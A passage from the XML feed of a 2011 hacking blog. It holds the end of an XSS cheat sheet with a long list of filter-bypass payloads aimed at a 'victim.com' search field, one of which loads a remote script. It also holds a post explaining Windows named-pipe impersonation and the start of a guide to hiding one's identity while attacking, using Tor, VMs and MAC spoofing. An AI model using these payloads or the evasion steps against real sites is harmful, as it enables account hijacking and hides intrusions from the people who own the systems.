href=&quot;http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html&quot; target=&quot;_blank&quot;&gt;XSS vulnerability in Babylon Search&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Stored or Persistent XSS attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;This attack is more dangerous and complicated compared to reflected XSS attack. In Stored or persistent XSS attack, the vulnerable script is stored on the target server and is activated once another user clicks on it. For example, consider a forum where the attacker posts a message containing a link to malicious script. Another user when views the message and clicks it, then the script activates and causes respective attack. &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;The attacker can craft a malicious script like a cookie stealing script of the form &lt;i&gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;/i&gt;and steal victims cookies to perform session hijacking.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;DOM based XSS attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;DOM or document object model based XSS attacks tries to exploit the structure of the page in which they reside. The attacker tries to trick the browser to execute the JavaScript or HTML code of his choice. Unlike the other two XSS attacks, DOM based attack takes the advantage of vulnerable javascript which executes directly in the user’s browser.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Consider the following piece of code:&lt;/span&gt;&lt;br /&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;var loc = document.location + &#39;?gotoHomepage=1&#39;;&lt;br /&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;document.write(&#39;&amp;lt;a href=&quot;&#39; + loc + &#39;&quot;&amp;gt;Home&amp;lt;/a&amp;gt;&#39;);&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The javascript variable document.location can easily be compromised by the attacker to pass a malicious javascript as it has no user input filters. A url of the form : http://site.com/index.html?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt; &amp;nbsp; can be created and passed as the HTTP header and can be executed directly into user’s document.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;Complete Cheat Sheet on XSS:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;font color=&quot;Red&quot;&amp;gt;&amp;lt;b&amp;gt;Pwned&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Bypassing Xss Simple Filteration Without Alteration:&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Now we notice, the above script we used for filtration is evolving only a few strings, knowing there are bunch of ways and&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;strings to inject a malicious request.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It&#39;s only filtering &#39;&amp;lt; &amp;gt; /&#39; means leaving hackers with a vast amount of other strings to inject a malicious code.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Now the question is since &#39;&amp;lt;&#39; and &#39;&amp;gt;&#39; are filtered, how we will be able to send a javascript or html code injection?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Well, the answer is quite easy, javascript can be executed using &#39; and &quot; before the orignal script.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For instance,&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&#39;)alert(&#39;xss&#39;);&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;This will generate an alert box again on a vulnerable server.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Secondly,&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;);alert(&#39;xss&#39;);&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;This will too generate an alert box on a vulnerable server.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bypassing Advance Xss Filtration:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Some webmasters filter lot more than this, especially it&#39;s filtered on important sites like gov and org sites.&lt;br /&gt;But all depends on their pattern if they are doing this in javascript, we will of course just alter the page but what if&amp;nbsp;the filtration is not in javascript, instead is in html or php or even asp.&lt;br /&gt;There&#39;s nothing impossible, we will try to get as much info about the filtration as much we can.&lt;br /&gt;Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the&amp;nbsp;beginning or in the end to avoid and abort it, this of course can be bypassed too!&lt;br /&gt;&lt;br /&gt;An example can be likely so:&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;helloworld&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The above script will bypass filtration for the server that reads the malicious string in the beginning.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;helloworld&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;script&amp;gt;helloworld&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will bypass filtration on server that reads whether in the beginning or in the end or at both ends!&lt;br /&gt;Mostly, this kind of filtration isn&#39;t common, so cant be of much use.&lt;br /&gt;Some webmasters also filter the word &#39;xss&#39; so it&#39;s likely to use some other message for making an alert.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(&#39;hello world&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will bypass message filtration.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Now we will study some more advance filtration bypass.&lt;br /&gt;&lt;br /&gt;Some webmasters just simply define a pattern of a cross-site scripting script that is possibly common.&lt;br /&gt;&lt;br /&gt;In this case, I will mention here the full array of strings to inject, bypassing the filtration.&lt;br /&gt;&lt;br /&gt;We will suppose injecting in a search form.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#39;hello world&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;hello world&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;hello world&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=//&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc//abc&quot;&amp;gt;&amp;lt;/script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=000&quot;&amp;gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1337);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=000abc&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/1337/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=--&amp;lt;script&amp;gt;&quot;&amp;gt;&amp;lt;/script&amp;gt;alert(/1337/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&amp;lt;script&amp;gt;document.write(&#39;abc&#39;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;document.write(1337);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&#39;)alert(1337);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&quot;;)alert(1337);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&quot;);alert(/pwned/);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned//&quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;location.href=&#39;javascript:alert(/pwned/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;img src=&#39;javascript:alert(&#39;xss&#39;);&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script src=&#39;http://malicous js&#39;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;These are a few simple and advanced scripts that can be used to check for XSS vulnerability. There are several automatic tools available as well but I would recommend that you first learn the manual method so that you can clearly understand the attack vector. Later on you can switch to automatic tools. In case you know any other XSS script that is missing in this tutorial then you can add in the comment box and I will update it in this tutorial along with your name.&lt;br /&gt;Special Thanks :&amp;nbsp;str0ke,USMAN,tushy,Hackman,shubham,Fix&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1828740309089422641/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/cross-site-scripting-cheat-sheet.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1828740309089422641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1828740309089422641'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/cross-site-scripting-cheat-sheet.html' title='Cross site scripting(XSS) Cheat Sheet - Readers Choice!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s72-c/images.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6219759490814130362</id><published>2011-12-10T00:54:00.001+05:30</published><updated>2011-12-10T01:04:53.923+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Namedpipe impersonation Attacks</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s1600/win.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;179&quot; src=&quot;http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s200/win.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven&#39;t heard a lot about this topic since then, is it still an issue?&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;First of all, let&#39;s talk about the problem.&lt;br /&gt;&lt;br /&gt;When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish.&lt;br /&gt;For example, let&#39;s assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-PDc9foU3ZIs/TuJiLtlLdII/AAAAAAAAA9Q/5Tn97Oon8sA/s1600/np.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;290&quot; src=&quot;http://1.bp.blogspot.com/-PDc9foU3ZIs/TuJiLtlLdII/AAAAAAAAA9Q/5Tn97Oon8sA/s640/np.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the &quot;Security Quality Of Service&quot;.&lt;br /&gt;&lt;br /&gt;There are 4 flags to define the impersonation level allowed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_ANONYMOUS&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process cannot obtain identification information about the client, and it cannot impersonate the client.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_IDENTIFICATION&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_IMPERSONATION&lt;/u&gt;&lt;/b&gt; - This is the default&lt;br /&gt;The server process can impersonate the client&#39;s security context on its local system. The server cannot impersonate the client on remote systems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_DELEGATION&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process can impersonate the client&#39;s security context on remote systems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are also 2 other flags:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_CONTEXT_TRACKING&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn&#39;t specified, the server adopts the context of the client at the time of the impersonation and doesn&#39;t receive any changes. This option is honored only when the client and server process are on the same system.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_EFFECTIVE_ONLY&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Prevents a server from enabling or disabling a client&#39;s privilege or group while the server is impersonating.&lt;br /&gt;&lt;br /&gt;Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don&#39;t forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored.&lt;br /&gt;&lt;br /&gt;Unfortunately, you don&#39;t have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. To &quot;fix&quot; that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited.&lt;br /&gt;&lt;br /&gt;A server can impersonate a client only if one of the following is true.&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;The caller has the SeImpersonatePrivilege privilege.&lt;/li&gt;&lt;li&gt;The requested impersonation level is SecurityIdentification or SecurityAnonymous.&lt;/li&gt;&lt;li&gt;The identity of the client is the same as the server.&lt;/li&gt;&lt;li&gt;The token of the client was created using LogonUser from inside the same logon session as the server.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6219759490814130362/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/namedpipe-impersonation-attacks.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6219759490814130362'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6219759490814130362'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/namedpipe-impersonation-attacks.html' title='Namedpipe impersonation Attacks'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s72-c/win.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6468968895363579875</id><published>2011-12-08T21:34:00.001+05:30</published><updated>2011-12-09T00:15:19.836+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="anonymous hacking group"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Complete Guide to staying Anonymous on Internet - Combining VMs and VPNs</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&quot;the Reason which makes Anonymous hactivists dangerous is that they are really ANONYMOUS - Darklord&quot;&lt;br /&gt;&lt;br /&gt;Hello friends. Sorry for the delay in post. Still waiting for the day when time will be in abundance for me. Today I have an interesting post for you all. In one of my several older posts I have been discussing how to penetrate different websites, perform attacks, gain information etc. But there is a big issue behind all this.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;While doing all these things we are putting our identity at stake. A real hacker always keeps his identity hidden and clears all tracks while dealing with such activities. Staying anonymous is a big kung-fu battle in this dangerous world of internet. So in this post I will try to solve this problem.&lt;br /&gt;&lt;br /&gt;Many of you might be aware of using &lt;a href=&quot;https://www.torproject.org/&quot; target=&quot;_blank&quot;&gt;TOR network&lt;/a&gt; as a way of staying anonymous but it is only half true. It does protect you to some extent but you need to add more efforts to keep yourself underground. In this tutorial we will learn how to setup a anonymous network using TOR virtual network and Virtual machines. So I am considering that you are aware of TOR and installing Virtual machines. I will be using Virtual box for this tutorial.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Note : If you use some other free VPN service then you can use it in place of TOR. Also If you have a paid VPN service then it will be an added&amp;nbsp;benefit&amp;nbsp;as it will provide you more anonymity and VPN bandwidth. In this tutorial I am using TOR as an example.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;We will start with our virtual machine. Suppose you have a Windows XP setup as a virtual machine. The first thing we have to do is to change the MAC address of the VM. To do this , go to the Virtualbox instance and select the Virtual machine, then click on SETTINGS. Move to the NETWORK tab. Choose the NAT adapter.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ebgkr5o6vlk/TuDip4hwCfI/AAAAAAAAA8w/mCe8dBcKOGY/s1600/anon1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;480&quot; src=&quot;http://2.bp.blogspot.com/-ebgkr5o6vlk/TuDip4hwCfI/AAAAAAAAA8w/mCe8dBcKOGY/s640/anon1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Click on the ADVANCE drop down menu to list the MAC address. You will notice something similar to the &amp;nbsp;shown image. Now change this MAC address to some other value. keep in mind to keep the number of characters equal to 12 and use same number of alphabets and numbers.&lt;br /&gt;&lt;br /&gt;Once you are done with changing the MAC address, the next step will be to start your winXP virtual machine and setup the TOR network.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;NOTE : In case you are using a wireless router then you can further enhance your anonymity by spoofing its MAC address first and then change the MAC for VM&#39;s NAT adapter.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now run your XP virtual machine and install TOR in it. TOR can be downloaded from&lt;a href=&quot;https://www.torproject.org/&quot; target=&quot;_blank&quot;&gt; here.&lt;/a&gt;&lt;br /&gt;After installing, run the program and wait till it connects to the tor network.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-GEIsDTMrYMM/TuDswYwtQNI/AAAAAAAAA84/Cgp_trtbllc/s1600/anon2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; 